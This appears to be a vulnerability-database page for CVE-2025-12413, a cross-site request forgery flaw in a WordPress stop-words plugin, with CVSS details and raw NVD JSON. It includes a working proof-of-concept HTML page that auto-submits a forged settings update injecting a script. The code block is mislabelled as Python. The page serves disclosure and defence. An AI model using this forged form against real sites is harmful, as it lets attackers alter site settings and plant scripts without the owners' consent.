Security Vulnerability Report
中文
CVE-2025-12413 CVSS 5.4 MEDIUM

CVE-2025-12413

Published: 2025-11-04 05:16:13
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Social Media WPCF7 Stop Words plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.3. This is due to missing or incorrect nonce validation on the smWpCfSwOptions() function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Social Media WPCF7 Stop Words plugin <= 1.1.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-12413 --> <!-- This PoC demonstrates the CSRF vulnerability in WPCF7 Stop Words plugin --> <!-- When a logged-in admin visits this page, plugin settings will be modified --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-12413</title> </head> <body> <h1>CSRF Attack PoC for WPCF7 Stop Words Plugin</h1> <p>If you are logged in as WordPress admin, the following form will be submitted automatically.</p> <form action="http://target-site/wp-admin/admin-post.php" method="POST" id="csrf-form"> <!-- Required WordPress admin-post.php parameters --> <input type="hidden" name="action" value="update"> <input type="hidden" name="option_page" value="sm_wpcf_sw_options_group"> <!-- Plugin settings that will be modified --> <input type="hidden" name="sm_wpcf_sw_stop_words" value="<script>alert('XSS via CSRF')</script>"> <input type="hidden" name="sm_wpcf_sw_enabled" value="1"> <!-- Submit button (auto-submit via JavaScript) --> <input type="submit" value="Submit"> </form> <script> // Auto-submit the form after page load document.getElementById('csrf-form').submit(); console.log('CSRF PoC submitted'); </script> <p><strong>Note:</strong> This PoC is for educational and security testing purposes only.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12413", "sourceIdentifier": "[email protected]", "published": "2025-11-04T05:16:13.340", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Social Media WPCF7 Stop Words plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.3. This is due to missing or incorrect nonce validation on the smWpCfSwOptions() function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wpcf7-stop-words/tags/1.1.3/social-media-wpcf7-stop-words.php#L45", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/27857a17-8cf0-40b3-894f-8dd7cf5108dd?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.